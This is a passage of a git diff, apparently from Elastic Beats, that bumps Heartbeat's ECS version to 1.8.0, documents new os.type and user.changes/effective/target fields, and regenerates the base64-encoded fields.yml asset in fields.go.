h1:Yn28gclW7X0Qy09nSMSsx0uOAvAGMsp6XHydbiLVe2s= github.com/elastic/go-txfile v0.0.7/go.mod h1:H0nCoFae0a4ga57apgxFsgmRjevNCsEaT6g56JoeKAE= github.com/elastic/go-ucfg v0.7.0/go.mod h1:iaiY0NBIYeasNgycLyTvhJftQlQEUO2hpF+FX0JKxzo= diff --git a/heartbeat/cmd/root.go b/heartbeat/cmd/root.go index d7b499afdcac..bfbfa22d1b46 100644 --- a/heartbeat/cmd/root.go +++ b/heartbeat/cmd/root.go @@ -41,7 +41,7 @@ const ( Name = "heartbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // RootCmd to handle beats cli diff --git a/heartbeat/docs/fields.asciidoc b/heartbeat/docs/fields.asciidoc index f574c6400c43..1588c1596e15 100644 --- a/heartbeat/docs/fields.asciidoc +++ b/heartbeat/docs/fields.asciidoc @@ -2186,7 +2186,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -2239,7 +2239,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -3430,6 +3430,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -4504,6 +4517,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -4674,6 +4700,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -7825,6 +7864,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -8000,6 +8040,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -8010,6 +8163,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -8113,6 +8379,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -8229,6 +8608,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/heartbeat/include/fields.go b/heartbeat/include/fields.go index d224f8a00458..8c5c30dcb6bc 100644 --- a/heartbeat/include/fields.go +++ b/heartbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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